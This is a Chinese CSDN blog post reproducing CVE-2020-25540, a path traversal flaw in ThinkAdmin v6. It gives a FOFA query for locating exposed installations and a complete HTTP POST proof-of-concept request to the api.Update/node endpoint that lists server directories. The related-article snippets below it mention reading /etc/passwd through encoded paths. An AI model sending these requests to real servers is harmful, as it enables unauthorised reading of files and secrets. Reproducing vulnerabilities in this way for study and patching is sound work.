ThinkAdmin任意文件读取漏洞(CVE-2020-25540)

最新推荐文章于 2024-07-19 14:18:42 发布
最新推荐文章于 2024-07-19 14:18:42 发布
阅读量724 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/113665215
版权
这篇博客介绍了ThinkAdmin6版本存在的路径遍历漏洞,该漏洞允许攻击者通过特定的POST请求读取服务器任意文件。复现过程包括使用FOFA搜索工具定位应用,以及构造POC进行漏洞验证。此问题警示了对API中危险函数的过滤和安全控制的重要性。
摘要由CSDN通过智能技术生成

简述

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统

漏洞描述

ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。

漏洞复现

fofa搜索语句 app="ThinkAdmin"
POC

POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://139.159.192.181
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://139.159.192.181/admin/login.html/?s=admin/api.Update/node
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=f54b3a7d1d63edc5a264133ef6865e95
Connection: close

rules=%5B%22%2F%22%5D

在这里插入图片描述
在这里插入图片描述

MD@@nr丫卡uer
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-10560 OSSN任意文件读取漏洞复现
锋刃科技的博客
12-12 456
漏洞概述 CVE-2020-10560 OSSN任意文件读取漏洞,问题出现在Open Source Social Network(OSSN)5.3及之前版本中。攻击者可通过对Site_Key实施暴力破解攻击来为components/OssnComments/ossn_com.php和libraries/ossn.lib.upgrade.php插入特制的URL,然后利用该漏洞读取任意文件。 环境搭建 首先通过git命令从github上下载OSSN环境,这里是通过docker搭建漏洞复现...
ThinkAdmin漏洞CVE-2020-25540 )复现
锋刃科技的博客
10-18 5261
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4772
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
漏洞复现】FastAdmin后台开发框架 lang 任意文件读取漏洞
siu~
06-17 1303
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
ThinkAdmin列目录/任意文件读取CVE-2020-25540漏洞复现及环境搭建
yzl_007的博客
08-03 2496
ThinkAdmin列目录/任意文件读取CVE-2020-25540漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发现没有,按照要求
CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
Jietewang的博客
12-11 3040
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 586
春秋云镜 CVE-2020-25540
ThinkAdminCVE-2020-25540漏洞复现
m0_48520508的博客
11-09 1894
0x00简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 非常适用快速二次开发,默认集成 微信开发组件,支持微信服务号,微信支付,支付宝支付,阿里云OSS存储,七牛云存储,本地服务器存储。,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未
CVE-2020-25540)Thinkadmin v6任意文件读取漏洞复现
thelostworld
09-24 907
Thinkadmin v6任意文件读取漏洞CVE-2020-25540)复现 ​ 快结束,抓住HVV的小尾巴,现在有空去复现最近出的漏洞 一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、..
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
ThinkAdmin后台管理系统
08-07
Think Admin 1.0 基于ThinkPHP5开发,初始的1.0版本没有开发成CMS,只是个后台管理系统,附带常用的功能,方便扩展使用。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
thinkadmin 目录遍历 (CVE-2020-25540
最新发布
qq_23003811的博客
07-19 160
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。3、1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s对应./../../etc/passwd的生成方法。在本地php环境,把脚本得到到poc.php中,访问poc.php生成。v5(任意文件读取)v6(列目录,任意文件读取)对结果进行base64解码。2、文件读取+目录穿越。
云镜CVE-2020-25540复现
m0_46684679的博客
02-26 648
Thinkadmin v6任意文件读取漏洞
Thinkadmin v6任意文件读取漏洞CVE-2020-25540)复现
weixin_39811856的博客
10-29 864
一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、影响范围: Thinkadmin版本小于 ≤ 2020.08.03.01 三、漏洞复现: 利用POC去打(burp直接放包不能成功回去.
[PHP代码审计]记一次后台任意文件读取&删除的审计
xiaoguaiii的博客
08-19 326
0x01 前言 一个很老的cms了,感谢小阳师傅给的练手cms,以下仅为此cms其中一个任意文件读取漏洞任意文件删除漏洞的审计笔记。 0x02 目录分析 拿到这个cms的时候发现是基于thinkphp3.2.3的框架结构开发的,代码审计前,看了下thinkphp3.2.3的开发手册,在看了整体目录和部分代码后,对目录的一个分析(仅为个人见解): └── uploads_code ├── App 默认应用目录 │ ├── Api (api接口) │ ├── Common
Tomcat 文件读取漏洞(CVE-2020-1938) 如何处理
09-09
对于Tomcat文件读取漏洞CVE-2020-1938),以下是一些处理方法: 1. 更新Tomcat版本:确保您使用的Tomcat版本已修复了该漏洞。Apache官方发布了修复程序的Tomcat版本,您应该升级到最新版本。 2. 配置安全限制:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值